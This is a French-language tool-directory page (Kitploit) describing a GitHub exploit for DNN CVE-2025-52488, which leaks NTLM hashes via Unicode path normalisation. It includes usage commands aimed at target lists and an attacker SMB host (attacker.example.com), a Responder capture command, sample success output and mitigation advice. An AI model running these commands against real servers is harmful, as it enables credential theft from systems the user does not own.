Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sh4den/cve-2025-52488
ReconnaissanceAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubsh4den/cve-2025-52488

CVE-2025-52488

Cet exploit cible une vulnérabilité dans DNN (anciennement DotNetNuke) versions 6.0.0 à avant 10.0.1 qui permet aux attaquants de divulguer des hachages NTLM via des attaques de normalisation de chemin Unicode.

Voir le dépôt
2il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
CVE-2025-52488 — Cet exploit cible une vulnérabilité dans DNN (anciennement DotNetNuke) versions 6.0.0 à avant 10.0.1 qui permet aux attaquants de divulguer des hachages NTLM via des attaques de normalisation de chemin Unicode. | Kitploit
Partager

Exploit de divulgation de hachage NTLM par normalisation de chemin Unicode pour DNN (CVE-2025-52488)

Aperçu

Cet exploit cible une vulnérabilité dans DNN (anciennement DotNetNuke) versions 6.0.0 à avant 10.0.1 qui permet aux attaquants de divulguer des hachages NTLM via des attaques de normalisation de chemin Unicode.

Détails de la vulnérabilité

  • CVE ID: CVE-2025-52488
  • Sévérité: Haute (CVSS 8.6)
  • Versions affectées: 6.0.0 à avant 10.0.1
  • Vecteur d'attaque: Réseau
  • Authentification: Non requise

Fonctionnement

L'exploit abuse des particularités de Windows/.NET et de la normalisation Unicode pour forcer le serveur DNN cible à effectuer des requêtes SMB vers un serveur contrôlé par l'attaquant, exposant potentiellement des hachages NTLM lors du processus d'authentification.

Prérequis

  1. Python 3.7+
  2. Paquets requis (installer avec pip install -r requirements.txt)
  3. Serveur SMB pour capturer les hachages NTLM (par ex., Responder, Burp Collaborator)

Utilisation

Utilisation de base

root@kitploit:~
python main.py targets.txt attacker.example.com

Avec paramètres personnalisés

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Arguments

  • targets : Fichier contenant la liste des hôtes DNN (un par ligne)
  • smb_server : Nom d'hôte/IP du serveur SMB pour capturer les hachages NTLM
  • -t, --threads : Nombre de threads simultanés (défaut : 10)
  • --timeout : Délai d'attente de requête en secondes (défaut : 10)

Format du fichier cible

Créez un fichier texte avec les URL cibles, une par ligne :

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

Configuration du serveur SMB

Vous pouvez utiliser des outils comme Responder pour capturer les hachages NTLM :

root@kitploit:~
responder -I eth0 -wrf

Ou utilisez Burp Collaborator pour la détection hors bande.

Exemple de sortie

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Démarrage de l'exploit de divulgation de hachage NTLM DNN contre 5 cibles
[2025-01-XX-XX:XX:XX] [INFO] Serveur SMB : attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Indicateur DNN trouvé : dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Point de terminaison de téléversement accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Charge utile de l'exploit envoyée avec succès
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Vérifiez votre serveur SMB pour les tentatives d'authentification NTLM entrantes

Indicateurs de détection

L'exploit recherche les indicateurs DNN suivants :

  • Cookie dnn_IsMobile
  • dotnetnuke dans la réponse
  • dnnconnect dans la réponse
  • DNN Platform dans la réponse

Atténuation

  • Mettre à jour DNN vers la version 10.0.1 ou ultérieure
  • Mettre en place des contrôles au niveau réseau pour empêcher les requêtes SMB vers des serveurs externes
  • Surveiller les tentatives de téléversement suspectes

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.

Références

  • CVE-2025-52488
  • Assetnote Research
Télécharger l’outil